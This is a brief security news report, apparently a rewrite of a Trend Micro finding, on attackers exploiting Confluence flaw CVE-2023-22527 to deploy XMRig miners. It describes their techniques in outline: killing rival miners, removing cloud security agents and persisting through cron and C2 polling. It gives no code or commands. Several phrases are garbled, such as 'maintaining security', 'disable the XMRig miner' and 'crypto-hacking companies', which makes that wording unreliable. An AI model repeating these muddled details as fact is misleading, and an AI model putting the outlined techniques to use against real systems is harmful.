Threat actors are actively exploiting a patched critical security flaw affecting the Atlassian Confluence data center and Confluence server to conduct illegal cryptocurrency mining on sensitive instances.
“Attacks involve threat actors using techniques such as deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing crypto mining processes, and maintaining security through cron jobs,” Trend Micro researcher Abdelrahman Esmail. said.
Exploited security vulnerability CVE-2023-22527a maximum severity bug in older versions of Atlassian Confluence Data Center and Confluence Server that could allow unauthenticated attackers to achieve remote code execution. In mid-January 2024, an Australian software development company addressed it.
Trend Micro said that between mid-June and the end of July 2024, there were a large number of attempts to exploit the flaw that used it to disable the XMRig miner on unpatched hosts. At least three different threat actors are said to be behind the malware –
- Running the XMRig miner via an ELF file payload using specially crafted queries
- Using a shell script that first stops competing crypto-hacking companies (such as Kinsing), deletes all existing cron jobs, removes cloud security tools from Alibaba and Tencent, and collects system information before setting up a new cron job that checks for commands and monitor (C2) server connection every five minutes and start miner
“Due to continued exploitation by threats, CVE-2023-22527 poses a significant security risk to organizations around the world,” Esmail said.
“To minimize the risk and threat associated with this vulnerability, administrators should update their versions of Confluence Data Center and Confluence Server to the latest available versions as soon as possible.”